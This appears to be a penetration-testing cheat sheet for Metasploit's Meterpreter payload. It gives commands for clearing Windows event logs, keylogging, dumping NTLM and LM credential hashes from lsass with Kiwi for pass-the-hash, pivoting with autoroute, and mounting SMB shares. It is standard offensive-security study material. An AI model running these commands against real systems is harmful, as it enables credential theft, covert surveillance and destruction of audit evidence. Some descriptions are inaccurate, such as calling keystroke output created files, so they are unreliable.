Tier II

Meterpreter

Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.

Meterpreter Icon

Meterpreter


Clearing Windows Event Logs (Windows)


Use this command to delete all the Windows Event log:
clearev


Keylogging (Windows)


Exploit a target and gain the Meterpreter shell (like in the previous examples)
Start gain keystrokes (any input on the target) of the target host:
keyscan_start

Show the files that the user have created:
keyscan_dump


Pass-the-Hash attack (Windows) with Metasploit


Exploit a target and gain the Meterpreter shell (like in the previous examples)
In the target Meterpreter shell, get the process ID:
pgrep lsass

Migrate to that ID:
migrate target-id

Get the name of the target system you are using:
getuid

Run Kiwi tool:
load kiwi

Get the admin username and NTLM credentials (hash):
lsa_dump_sam

Get also the LM hash password of the target(s):
hashdump

After you have got the hashes you can run the Metasploit framework again


Save target new ip in Metasploit


After exploit, save the other ip that the target is using:
run autoroute -s new-target-ip


SMB - Samba Shares in a Meterpreter shell


net use D: \\target-ip\share